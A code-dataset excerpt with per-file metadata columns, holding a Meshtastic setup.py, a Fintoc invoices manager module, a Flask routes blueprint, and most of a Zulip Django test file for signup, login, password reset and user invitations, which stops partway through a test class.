hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
03363eef7025fa99b4d3764cff3b4ec766405a19
| 1,429
|
py
|
Python
|
setup.py
|
crossan007/Meshtastic-python
|
27c827cf3d42aec9834600b1b61a1681b0c714a9
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
crossan007/Meshtastic-python
|
27c827cf3d42aec9834600b1b61a1681b0c714a9
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
crossan007/Meshtastic-python
|
27c827cf3d42aec9834600b1b61a1681b0c714a9
|
[
"Apache-2.0"
] | null | null | null |
# Note: you shouldn't need to run this script manually. It is run implicitly by the pip3 install command.
import pathlib
from setuptools import setup
# The directory containing this file
HERE = pathlib.Path(__file__).parent
with open("README.md", "r") as fh:
long_description = fh.read()
# This call to setup() does all the work
setup(
name="meshtastic",
version="1.2.6",
description="Python API & client shell for talking to Meshtastic devices",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/meshtastic/Meshtastic-python",
author="Kevin Hester",
author_email="kevinh@geeksville.com",
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
],
packages=["meshtastic"],
include_package_data=True,
install_requires=["pyserial>=3.4", "protobuf>=3.13.0",
"pypubsub>=4.0.3", "dotmap>=1.3.14", "pexpect>=4.6.0", "pyqrcode>=1.2.1",
"pygatt>=4.0.5", "easy-table==0.0.4"],
extras_require={
'tunnel': ["pytap2>=2.0.0"]
},
python_requires='>=3.6',
entry_points={
"console_scripts": [
"meshtastic=meshtastic.__main__:main",
"mesh-tunnel=meshtastic.__main__:tunnelMain [tunnel]"
]
},
)
| 32.477273
| 106
| 0.628411
|
9caf9f0fa2308af1bd3ec8fa4ade1378d9f156e8
| 213
|
py
|
Python
|
fintoc/managers/invoices_manager.py
|
KnowYourselves/fintoc-python
|
7b61850db6bb029aafd6fbf8e37b46e1188474a9
|
[
"BSD-3-Clause"
] | 80
|
2020-05-10T13:41:26.000Z
|
2022-01-14T14:20:40.000Z
|
fintoc/managers/invoices_manager.py
|
nmassardot/fintoc-python
|
5560e1f06ede0ff155d4274d3d8cf91e40e53710
|
[
"BSD-3-Clause"
] | 23
|
2020-05-27T22:48:06.000Z
|
2022-01-04T13:40:09.000Z
|
fintoc/managers/invoices_manager.py
|
nmassardot/fintoc-python
|
5560e1f06ede0ff155d4274d3d8cf91e40e53710
|
[
"BSD-3-Clause"
] | 8
|
2020-09-22T16:13:32.000Z
|
2021-12-11T19:58:58.000Z
|
"""Module to hold the invoices manager."""
from fintoc.mixins import ManagerMixin
class InvoicesManager(ManagerMixin):
"""Represents an invoices manager."""
resource = "invoice"
methods = ["all"]
| 17.75
| 42
| 0.694836
|
35d2c9440aa28f81257dfb943be20e3163edfd05
| 1,072
|
py
|
Python
|
routes/index.py
|
MatanelAbayof/Wikishield
|
9cc34e413eb8fd0246555e8df93fe774a4531955
|
[
"Apache-2.0"
] | 1
|
2020-08-19T10:19:22.000Z
|
2020-08-19T10:19:22.000Z
|
routes/index.py
|
MatanelAbayof/Wikishield
|
9cc34e413eb8fd0246555e8df93fe774a4531955
|
[
"Apache-2.0"
] | null | null | null |
routes/index.py
|
MatanelAbayof/Wikishield
|
9cc34e413eb8fd0246555e8df93fe774a4531955
|
[
"Apache-2.0"
] | null | null | null |
from flask import Blueprint, redirect, render_template
index = Blueprint('index', __name__)
# ----------------------------------------------------------------------------------------------------
@index.route('/')
def homepage():
"""
homepage route
"""
return render_template("homepage.html")
# ----------------------------------------------------------------------------------------------------
@index.route('/score_rev')
def score_rev():
"""
score revision route
"""
return render_template("score_rev.html")
# ----------------------------------------------------------------------------------------------------
@index.route('/verify_revs')
def verify_revs():
"""
verify revisions route
"""
return render_template("verify_revs.html")
# ----------------------------------------------------------------------------------------------------
@index.route('/favicon.ico')
def favicon():
"""
route of favorite icon
the browser request this URL automatically
"""
return redirect("images/logo.ico")
| 23.304348
| 102
| 0.399254
|
2dc8c61e3884b41f3677b78b73b90cc2ee5c0ac0
| 100,699
|
py
|
Python
|
zerver/tests/test_signup.py
|
rtzll/zulip
|
b831df8f7fc2f5b89ec998266901ac491d52a7fc
|
[
"Apache-2.0"
] | null | null | null |
zerver/tests/test_signup.py
|
rtzll/zulip
|
b831df8f7fc2f5b89ec998266901ac491d52a7fc
|
[
"Apache-2.0"
] | null | null | null |
zerver/tests/test_signup.py
|
rtzll/zulip
|
b831df8f7fc2f5b89ec998266901ac491d52a7fc
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.http import HttpResponse
from django.test import TestCase, override_settings
from django.utils.timezone import now as timezone_now
from mock import patch, MagicMock
from zerver.lib.test_helpers import MockLDAP
from confirmation.models import Confirmation, create_confirmation_link, MultiuseInvite, \
generate_key, confirmation_url
from zerver.forms import HomepageForm, WRONG_SUBDOMAIN_ERROR
from zerver.lib.actions import do_change_password, gather_subscriptions
from zerver.views.auth import login_or_register_remote_user
from zerver.views.invite import get_invitee_emails_set
from zerver.views.registration import confirmation_key, \
redirect_and_log_into_subdomain, send_registration_completion_email
from zerver.models import (
get_realm, get_prereg_user_by_email, get_user, get_recipient,
PreregistrationUser, Realm, RealmDomain, Recipient, Message,
ScheduledEmail, UserProfile, UserMessage,
Stream, Subscription, flush_per_request_caches
)
from zerver.lib.actions import (
set_default_streams,
do_change_is_admin,
get_stream,
do_create_realm,
)
from zerver.lib.send_email import send_email, send_future_email, FromAddress
from zerver.lib.initial_password import initial_password
from zerver.lib.actions import (
do_deactivate_realm,
do_deactivate_user,
do_set_realm_property,
add_new_user_history,
)
from zerver.lib.mobile_auth_otp import xor_hex_strings, ascii_to_hex, \
otp_encrypt_api_key, is_valid_otp, hex_to_ascii, otp_decrypt_api_key
from zerver.lib.notifications import enqueue_welcome_emails, \
one_click_unsubscribe_link
from zerver.lib.subdomains import is_root_domain_available
from zerver.lib.test_helpers import find_pattern_in_email, find_key_by_email, queries_captured, \
HostRequestMock, unsign_subdomain_cookie
from zerver.lib.test_classes import (
ZulipTestCase,
)
from zerver.lib.test_runner import slow
from zerver.lib.sessions import get_session_dict_user
from zerver.context_processors import common_context
from collections import defaultdict
import re
import smtplib
import ujson
from typing import Any, Dict, List, Optional, Set, Text
from six.moves import urllib, range, zip
import os
class RedirectAndLogIntoSubdomainTestCase(ZulipTestCase):
def test_cookie_data(self):
# type: () -> None
realm = Realm.objects.all().first()
name = 'Hamlet'
email = self.example_email("hamlet")
response = redirect_and_log_into_subdomain(realm, name, email)
data = unsign_subdomain_cookie(response)
self.assertDictEqual(data, {'name': name, 'email': email,
'subdomain': realm.subdomain,
'is_signup': False})
response = redirect_and_log_into_subdomain(realm, name, email,
is_signup=True)
data = unsign_subdomain_cookie(response)
self.assertDictEqual(data, {'name': name, 'email': email,
'subdomain': realm.subdomain,
'is_signup': True})
class DeactivationNoticeTestCase(ZulipTestCase):
def test_redirection_for_deactivated_realm(self):
# type: () -> None
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
for url in ('/register/', '/login/'):
result = self.client_get(url)
self.assertEqual(result.status_code, 302)
self.assertIn('deactivated', result.url)
def test_redirection_for_active_realm(self):
# type: () -> None
for url in ('/register/', '/login/'):
result = self.client_get(url)
self.assertEqual(result.status_code, 200)
def test_deactivation_notice_when_realm_is_active(self):
# type: () -> None
result = self.client_get('/accounts/deactivated/')
self.assertEqual(result.status_code, 302)
self.assertIn('login', result.url)
def test_deactivation_notice_when_deactivated(self):
# type: () -> None
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.client_get('/accounts/deactivated/')
self.assertIn("Zulip Dev, has been deactivated.", result.content.decode())
class AddNewUserHistoryTest(ZulipTestCase):
def test_add_new_user_history_race(self):
# type: () -> None
"""Sends a message during user creation"""
# Create a user who hasn't had historical messages added
stream_dict = {
"Denmark": {"description": "A Scandinavian country", "invite_only": False},
"Verona": {"description": "A city in Italy", "invite_only": False}
} # type: Dict[Text, Dict[Text, Any]]
realm = get_realm('zulip')
set_default_streams(realm, stream_dict)
with patch("zerver.lib.actions.add_new_user_history"):
self.register(self.nonreg_email('test'), "test")
user_profile = self.nonreg_user('test')
subs = Subscription.objects.select_related("recipient").filter(
user_profile=user_profile, recipient__type=Recipient.STREAM)
streams = Stream.objects.filter(id__in=[sub.recipient.type_id for sub in subs])
self.send_message(self.example_email('hamlet'), streams[0].name, Recipient.STREAM, "test")
add_new_user_history(user_profile, streams)
class PasswordResetTest(ZulipTestCase):
"""
Log in, reset password, log out, log in with new password.
"""
def test_password_reset(self):
# type: () -> None
email = self.example_email("hamlet")
old_password = initial_password(email)
self.login(email)
# test password reset template
result = self.client_get('/accounts/password/reset/')
self.assert_in_response('Reset your password', result)
# start the password reset process by supplying an email address
result = self.client_post('/accounts/password/reset/', {'email': email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email to finish the process.", result)
# Check that the password reset email is from a noreply address.
from django.core.mail import outbox
from_email = outbox[0].from_email
self.assertIn("Zulip Account Security", from_email)
self.assertIn(FromAddress.NOREPLY, from_email)
# Visit the password reset link.
password_reset_url = self.get_confirmation_url_from_outbox(email, "(\S+)")
result = self.client_get(password_reset_url)
self.assertEqual(result.status_code, 200)
# Reset your password
result = self.client_post(password_reset_url,
{'new_password1': 'new_password',
'new_password2': 'new_password'})
# password reset succeeded
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/password/done/"))
# log back in with new password
self.login(email, password='new_password')
user_profile = self.example_user('hamlet')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
# make sure old password no longer works
self.login(email, password=old_password, fails=True)
def test_invalid_subdomain(self):
# type: () -> None
email = self.example_email("hamlet")
string_id = 'hamlet'
name = 'Hamlet'
do_create_realm(
string_id,
name,
restricted_to_domain=False,
invite_required=False
)
with patch('zerver.forms.get_subdomain', return_value=string_id):
# start the password reset process by supplying an email address
result = self.client_post(
'/accounts/password/reset/', {'email': email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email to finish the process.", result)
from django.core.mail import outbox
self.assertEqual(len(outbox), 1)
message = outbox.pop()
self.assertIn(FromAddress.NOREPLY, message.from_email)
self.assertIn("hamlet@zulip.com does not\nhave an active account in http://",
message.body)
def test_correct_subdomain(self):
# type: () -> None
email = self.example_email("hamlet")
string_id = 'zulip'
with patch('zerver.forms.get_subdomain', return_value=string_id):
# start the password reset process by supplying an email address
result = self.client_post(
'/accounts/password/reset/', {'email': email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email to finish the process.", result)
from django.core.mail import outbox
self.assertEqual(len(outbox), 1)
message = outbox.pop()
self.assertIn("Zulip Account Security", message.from_email)
self.assertIn(FromAddress.NOREPLY, message.from_email)
self.assertIn("Psst. Word on the street is that you",
message.body)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_auth_only(self):
# type: () -> None
"""If the email auth backend is not enabled, password reset should do nothing"""
email = self.example_email("hamlet")
result = self.client_post('/accounts/password/reset/', {'email': email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email to finish the process.", result)
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_redirect_endpoints(self):
# type: () -> None
'''
These tests are mostly designed to give us 100% URL coverage
in our URL coverage reports. Our mechanism for finding URL
coverage doesn't handle redirects, so we just have a few quick
tests here.
'''
result = self.client_get('/accounts/password/reset/done/')
self.assert_in_success_response(["Check your email"], result)
result = self.client_get('/accounts/password/done/')
self.assert_in_success_response(["We've reset your password!"], result)
result = self.client_get('/accounts/send_confirm/alice@example.com')
self.assert_in_success_response(["Still no email?"], result)
class LoginTest(ZulipTestCase):
"""
Logging in, registration, and logging out.
"""
def test_login(self):
# type: () -> None
self.login(self.example_email("hamlet"))
user_profile = self.example_user('hamlet')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_login_bad_password(self):
# type: () -> None
self.login(self.example_email("hamlet"), password="wrongpassword", fails=True)
self.assertIsNone(get_session_dict_user(self.client.session))
def test_login_nonexist_user(self):
# type: () -> None
result = self.login_with_return("xxx@zulip.com", "xxx")
self.assert_in_response("Please enter a correct email and password", result)
def test_register(self):
# type: () -> None
realm = get_realm("zulip")
stream_dict = {"stream_"+str(i): {"description": "stream_%s_description" % i, "invite_only": False}
for i in range(40)} # type: Dict[Text, Dict[Text, Any]]
for stream_name in stream_dict.keys():
self.make_stream(stream_name, realm=realm)
set_default_streams(realm, stream_dict)
# Clear all the caches.
flush_per_request_caches()
ContentType.objects.clear_cache()
Site.objects.clear_cache()
with queries_captured() as queries:
self.register(self.nonreg_email('test'), "test")
# Ensure the number of queries we make is not O(streams)
self.assert_length(queries, 65)
user_profile = self.nonreg_user('test')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
self.assertFalse(user_profile.enable_stream_desktop_notifications)
def test_register_deactivated(self):
# type: () -> None
"""
If you try to register for a deactivated realm, you get a clear error
page.
"""
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.client_post('/accounts/home/', {'email': self.nonreg_email('test')},
subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual('/accounts/deactivated/', result.url)
with self.assertRaises(UserProfile.DoesNotExist):
self.nonreg_user('test')
def test_register_deactivated_partway_through(self):
# type: () -> None
"""
If you try to register for a deactivated realm, you get a clear error
page.
"""
email = self.nonreg_email('test')
result = self.client_post('/accounts/home/', {'email': email},
subdomain="zulip")
self.assertEqual(result.status_code, 302)
print(result.url)
self.assertNotIn('deactivated', result.url)
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.submit_reg_form_for_user(email, "abcd1234", subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual('/accounts/deactivated/', result.url)
with self.assertRaises(UserProfile.DoesNotExist):
self.nonreg_user('test')
def test_login_deactivated(self):
# type: () -> None
"""
If you try to log in to a deactivated realm, you get a clear error page.
"""
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.login_with_return(self.example_email("hamlet"), subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual('/accounts/deactivated/', result.url)
def test_logout(self):
# type: () -> None
self.login(self.example_email("hamlet"))
# We use the logout API, not self.logout, to make sure we test
# the actual logout code path.
self.client_post('/accounts/logout/')
self.assertIsNone(get_session_dict_user(self.client.session))
def test_non_ascii_login(self):
# type: () -> None
"""
You can log in even if your password contain non-ASCII characters.
"""
email = self.nonreg_email('test')
password = u"hümbüǵ"
# Registering succeeds.
self.register(email, password)
user_profile = self.nonreg_user('test')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
self.logout()
self.assertIsNone(get_session_dict_user(self.client.session))
# Logging in succeeds.
self.logout()
self.login(email, password)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_login_page_redirects_logged_in_user(self):
# type: () -> None
"""You will be redirected to the app's main page if you land on the
login page when already logged in.
"""
self.login(self.example_email("cordelia"))
response = self.client_get("/login/")
self.assertEqual(response["Location"], "http://zulip.testserver")
class InviteUserBase(ZulipTestCase):
def check_sent_emails(self, correct_recipients, custom_body=None, custom_from_name=None):
# type: (List[Text], Optional[str], Optional[str]) -> None
from django.core.mail import outbox
self.assertEqual(len(outbox), len(correct_recipients))
email_recipients = [email.recipients()[0] for email in outbox]
self.assertEqual(sorted(email_recipients), sorted(correct_recipients))
if len(outbox) == 0:
return
if custom_body is None:
self.assertNotIn("Message from", outbox[0].body)
else:
self.assertIn("Message from ", outbox[0].body)
self.assertIn(custom_body, outbox[0].body)
if custom_from_name is not None:
self.assertIn(custom_from_name, outbox[0].from_email)
self.assertIn(FromAddress.NOREPLY, outbox[0].from_email)
class InviteUserTest(InviteUserBase):
def invite(self, users, streams, body='', invite_as_admin="false"):
# type: (Text, List[Text], str, str) -> HttpResponse
"""
Invites the specified users to Zulip with the specified streams.
users should be a string containing the users to invite, comma or
newline separated.
streams should be a list of strings.
"""
return self.client_post("/json/invites",
{"invitee_emails": users,
"stream": streams,
"invite_as_admin": invite_as_admin,
"custom_body": body})
def test_successful_invite_user(self):
# type: () -> None
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login(self.example_email("hamlet"))
invitee = "alice-test@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(invitee))
self.check_sent_emails([invitee], custom_from_name="Hamlet")
def test_successful_invite_user_as_admin_from_admin_account(self):
# type: () -> None
"""
Test that a new user invited to a stream receives some initial
history but only from public streams.
"""
self.login(self.example_email('iago'))
invitee = self.nonreg_email('alice')
self.assert_json_success(self.invite(invitee, ["Denmark"], invite_as_admin="true"))
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user('alice')
self.assertTrue(invitee_profile.is_realm_admin)
def test_invite_user_as_admin_from_normal_account(self):
# type: () -> None
"""
Test that a new user invited to a stream receives some initial
history but only from public streams.
"""
self.login(self.example_email('hamlet'))
invitee = self.nonreg_email('alice')
response = self.invite(invitee, ["Denmark"], invite_as_admin="true")
self.assert_json_error(response, "Must be a realm administrator")
def test_successful_invite_user_with_custom_body(self):
# type: () -> None
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login(self.example_email("hamlet"))
invitee = "alice-test@zulip.com"
body = "Custom Text."
self.assert_json_success(self.invite(invitee, ["Denmark"], body))
self.assertTrue(find_pattern_in_email(invitee, body))
self.check_sent_emails([invitee], custom_body=body, custom_from_name="Hamlet")
def test_successful_invite_user_with_name(self):
# type: () -> None
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login(self.example_email("hamlet"))
email = "alice-test@zulip.com"
invitee = "Alice Test <{}>".format(email)
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.check_sent_emails([email], custom_from_name="Hamlet")
def test_successful_invite_user_with_name_and_normal_one(self):
# type: () -> None
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login(self.example_email("hamlet"))
email = "alice-test@zulip.com"
email2 = "bob-test@zulip.com"
invitee = "Alice Test <{}>, {}".format(email, email2)
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2], custom_from_name="Hamlet")
def test_require_realm_admin(self):
# type: () -> None
"""
The invite_by_admins_only realm setting works properly.
"""
realm = get_realm('zulip')
realm.invite_by_admins_only = True
realm.save()
self.login("hamlet@zulip.com")
email = "alice-test@zulip.com"
email2 = "bob-test@zulip.com"
invitee = "Alice Test <{}>, {}".format(email, email2)
self.assert_json_error(self.invite(invitee, ["Denmark"]),
"Must be a realm administrator")
# Now verify an administrator can do it
self.login("iago@zulip.com")
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
def test_successful_invite_user_with_notifications_stream(self):
# type: () -> None
"""
A call to /json/invites with valid parameters unconditionally
subscribes the invitee to the notifications stream if it exists and is
public.
"""
realm = get_realm('zulip')
notifications_stream = get_stream('Verona', realm)
realm.notifications_stream_id = notifications_stream.id
realm.save()
self.login(self.example_email("hamlet"))
invitee = 'alice-test@zulip.com'
self.assert_json_success(self.invite(invitee, ['Denmark']))
self.assertTrue(find_key_by_email(invitee))
self.check_sent_emails([invitee])
prereg_user = get_prereg_user_by_email(invitee)
stream_ids = [stream.id for stream in prereg_user.streams.all()]
self.assertTrue(notifications_stream.id in stream_ids)
def test_invite_user_signup_initial_history(self):
# type: () -> None
"""
Test that a new user invited to a stream receives some initial
history but only from public streams.
"""
self.login(self.example_email('hamlet'))
user_profile = self.example_user('hamlet')
private_stream_name = "Secret"
self.make_stream(private_stream_name, invite_only=True)
self.subscribe(user_profile, private_stream_name)
public_msg_id = self.send_message(self.example_email("hamlet"), "Denmark", Recipient.STREAM,
"Public topic", "Public message")
secret_msg_id = self.send_message(self.example_email("hamlet"), private_stream_name, Recipient.STREAM,
"Secret topic", "Secret message")
invitee = self.nonreg_email('alice')
self.assert_json_success(self.invite(invitee, [private_stream_name, "Denmark"]))
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user('alice')
invitee_msg_ids = [um.message_id for um in
UserMessage.objects.filter(user_profile=invitee_profile)]
self.assertTrue(public_msg_id in invitee_msg_ids)
self.assertFalse(secret_msg_id in invitee_msg_ids)
self.assertFalse(invitee_profile.is_realm_admin)
# Test that exactly 2 new Zulip messages were sent, both notifications.
last_3_messages = list(reversed(list(Message.objects.all().order_by("-id")[0:3])))
first_msg = last_3_messages[0]
self.assertEqual(first_msg.id, secret_msg_id)
# The first, from notification-bot to the user who invited the new user.
second_msg = last_3_messages[1]
self.assertEqual(second_msg.sender.email, "notification-bot@zulip.com")
self.assertTrue(second_msg.content.startswith("alice_zulip.com <`alice@zulip.com`> accepted your"))
# The second, from welcome-bot to the user who was invited.
third_msg = last_3_messages[2]
self.assertEqual(third_msg.sender.email, "welcome-bot@zulip.com")
self.assertTrue(third_msg.content.startswith("Hello, and welcome to Zulip!"))
def test_multi_user_invite(self):
# type: () -> None
"""
Invites multiple users with a variety of delimiters.
"""
self.login(self.example_email("hamlet"))
# Intentionally use a weird string.
self.assert_json_success(self.invite(
"""bob-test@zulip.com, carol-test@zulip.com,
dave-test@zulip.com
earl-test@zulip.com""", ["Denmark"]))
for user in ("bob", "carol", "dave", "earl"):
self.assertTrue(find_key_by_email("%s-test@zulip.com" % (user,)))
self.check_sent_emails(["bob-test@zulip.com", "carol-test@zulip.com",
"dave-test@zulip.com", "earl-test@zulip.com"])
def test_missing_or_invalid_params(self):
# type: () -> None
"""
Tests inviting with various missing or invalid parameters.
"""
self.login(self.example_email("hamlet"))
self.assert_json_error(
self.client_post("/json/invites",
{"invitee_emails": "foo@zulip.com",
"custom_body": ''}),
"You must specify at least one stream for invitees to join.")
for address in ("noatsign.com", "outsideyourdomain@example.net"):
self.assert_json_error(
self.invite(address, ["Denmark"]),
"Some emails did not validate, so we didn't send any invitations.")
self.check_sent_emails([])
self.assert_json_error(
self.invite("", ["Denmark"]),
"You must specify at least one email address.")
self.check_sent_emails([])
def test_invalid_stream(self):
# type: () -> None
"""
Tests inviting to a non-existent stream.
"""
self.login(self.example_email("hamlet"))
self.assert_json_error(self.invite("iago-test@zulip.com", ["NotARealStream"]),
"Stream does not exist: NotARealStream. No invites were sent.")
self.check_sent_emails([])
def test_invite_existing_user(self):
# type: () -> None
"""
If you invite an address already using Zulip, no invitation is sent.
"""
self.login(self.example_email("hamlet"))
self.assert_json_error(
self.client_post("/json/invites",
{"invitee_emails": self.example_email("hamlet"),
"stream": ["Denmark"],
"custom_body": ''}),
"We weren't able to invite anyone.")
self.assertRaises(PreregistrationUser.DoesNotExist,
lambda: PreregistrationUser.objects.get(
email=self.example_email("hamlet")))
self.check_sent_emails([])
def test_invite_some_existing_some_new(self):
# type: () -> None
"""
If you invite a mix of already existing and new users, invitations are
only sent to the new users.
"""
self.login(self.example_email("hamlet"))
existing = [self.example_email("hamlet"), u"othello@zulip.com"]
new = [u"foo-test@zulip.com", u"bar-test@zulip.com"]
result = self.client_post("/json/invites",
{"invitee_emails": "\n".join(existing + new),
"stream": ["Denmark"],
"custom_body": ''})
self.assert_json_error(result,
"Some of those addresses are already using Zulip, \
so we didn't send them an invitation. We did send invitations to everyone else!")
# We only created accounts for the new users.
for email in existing:
self.assertRaises(PreregistrationUser.DoesNotExist,
lambda: PreregistrationUser.objects.get(
email=email))
for email in new:
self.assertTrue(PreregistrationUser.objects.get(email=email))
# We only sent emails to the new users.
self.check_sent_emails(new)
prereg_user = get_prereg_user_by_email('foo-test@zulip.com')
self.assertEqual(prereg_user.email, 'foo-test@zulip.com')
def test_invite_outside_domain_in_closed_realm(self):
# type: () -> None
"""
In a realm with `restricted_to_domain = True`, you can't invite people
with a different domain from that of the realm or your e-mail address.
"""
zulip_realm = get_realm("zulip")
zulip_realm.restricted_to_domain = True
zulip_realm.save()
self.login(self.example_email("hamlet"))
external_address = "foo@example.com"
self.assert_json_error(
self.invite(external_address, ["Denmark"]),
"Some emails did not validate, so we didn't send any invitations.")
def test_invite_outside_domain_in_open_realm(self):
# type: () -> None
"""
In a realm with `restricted_to_domain = False`, you can invite people
with a different domain from that of the realm or your e-mail address.
"""
zulip_realm = get_realm("zulip")
zulip_realm.restricted_to_domain = False
zulip_realm.save()
self.login(self.example_email("hamlet"))
external_address = "foo@example.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
def test_invite_outside_domain_before_closing(self):
# type: () -> None
"""
If you invite someone with a different domain from that of the realm
when `restricted_to_domain = False`, but `restricted_to_domain` later
changes to true, the invitation should succeed but the invitee's signup
attempt should fail.
"""
zulip_realm = get_realm("zulip")
zulip_realm.restricted_to_domain = False
zulip_realm.save()
self.login(self.example_email("hamlet"))
external_address = "foo@example.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
zulip_realm.restricted_to_domain = True
zulip_realm.save()
result = self.submit_reg_form_for_user("foo@example.com", "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response("only allows users with e-mail", result)
def test_invite_with_non_ascii_streams(self):
# type: () -> None
"""
Inviting someone to streams with non-ASCII characters succeeds.
"""
self.login(self.example_email("hamlet"))
invitee = "alice-test@zulip.com"
stream_name = u"hümbüǵ"
# Make sure we're subscribed before inviting someone.
self.subscribe(self.example_user("hamlet"), stream_name)
self.assert_json_success(self.invite(invitee, [stream_name]))
def test_invitation_reminder_email(self):
# type: () -> None
from django.core.mail import outbox
# All users belong to zulip realm
referrer_user = 'hamlet'
current_user_email = self.example_email(referrer_user)
self.login(current_user_email)
invitee_email = self.nonreg_email('alice')
self.assert_json_success(self.invite(invitee_email, ["Denmark"]))
self.assertTrue(find_key_by_email(invitee_email))
self.check_sent_emails([invitee_email])
data = {"email": invitee_email, "referrer_email": current_user_email}
invitee = get_prereg_user_by_email(data["email"])
referrer = self.example_user(referrer_user)
link = create_confirmation_link(invitee, referrer.realm.host, Confirmation.INVITATION)
context = common_context(referrer)
context.update({
'activate_url': link,
'referrer_name': referrer.full_name,
'referrer_email': referrer.email,
'referrer_realm_name': referrer.realm.name,
})
with self.settings(EMAIL_BACKEND='django.core.mail.backends.console.EmailBackend'):
send_future_email(
"zerver/emails/invitation_reminder", to_email=data["email"],
from_address=FromAddress.NOREPLY, context=context)
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now())
self.assertEqual(len(email_jobs_to_deliver), 1)
email_count = len(outbox)
for job in email_jobs_to_deliver:
send_email(**ujson.loads(job.data))
self.assertEqual(len(outbox), email_count + 1)
self.assertIn(FromAddress.NOREPLY, outbox[-1].from_email)
# Now verify that signing up clears invite_reminder emails
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now(), type=ScheduledEmail.INVITATION_REMINDER)
self.assertEqual(len(email_jobs_to_deliver), 1)
self.register(invitee_email, "test")
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now(), type=ScheduledEmail.INVITATION_REMINDER)
self.assertEqual(len(email_jobs_to_deliver), 0)
class InviteeEmailsParserTests(TestCase):
def setUp(self):
# type: () -> None
self.email1 = "email1@zulip.com"
self.email2 = "email2@zulip.com"
